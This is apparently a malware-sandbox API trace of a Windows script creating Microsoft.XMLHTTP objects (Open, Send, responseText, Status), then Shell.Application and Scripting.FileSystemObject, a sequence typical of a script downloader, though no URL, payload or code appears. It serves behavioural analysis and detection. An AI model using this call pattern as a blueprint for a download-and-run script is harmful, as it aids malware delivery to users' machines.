	[0719.780] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0719.780] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0719.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0719.780] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0719.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0719.781] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0719.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0719.781] longjmp () 
	[0719.781] longjmp () 
	[0719.781] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0719.781] SysStringLen (param_1=0x0) returned 0x0
	[0719.781] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0719.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0719.781] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0719.781] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0719.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0719.781] ??2@YAPEAX_K@Z () returned 0x62f330
	[0719.781] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0719.781] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0719.782] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0719.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0719.782] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0719.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0719.782] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0719.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0719.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0719.782] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0719.782] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0724.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0724.565] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0724.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0724.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0724.565] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0724.565] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0724.566] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0724.566] SysStringLen (param_1=0x0) returned 0x0
	[0724.566] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0724.566] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0724.566] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0724.566] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0724.566] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0724.566] ??2@YAPEAX_K@Z () returned 0x62f350
	[0724.566] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0724.566] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0724.566] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0724.566] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0724.567] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0724.567] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0724.567] SysStringLen (param_1=0x0) returned 0x0
	[0724.567] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0724.570] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0724.570] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0724.570] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0724.570] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0724.570] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0724.571] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0726.227] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0726.227] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0726.227] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0726.229] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0726.229] SysStringLen (param_1=0x0) returned 0x0
	[0726.229] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0726.229] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0726.229] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0726.229] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0726.229] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0726.229] ??2@YAPEAX_K@Z () returned 0x62f330
	[0726.229] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0726.230] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0726.230] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0726.230] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0726.230] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0726.230] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0726.230] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0726.233] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0726.233] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0726.233] SysStringLen (param_1=0x0) returned 0x0
	[0726.233] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0726.234] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0726.234] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0726.234] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0726.234] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0726.234] ??2@YAPEAX_K@Z () returned 0x62f310
	[0726.234] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0726.234] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0726.234] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0726.234] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0726.234] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0726.235] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0726.235] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0726.235] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0726.235] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0726.235] SysStringLen (param_1=0x0) returned 0x0
	[0726.235] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0726.235] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0726.235] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0726.235] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0726.235] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74c8) returned 0x0
	[0726.235] ??2@YAPEAX_K@Z () returned 0x62f330
	[0726.236] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74c8, pUnkSite=0x62f330) 
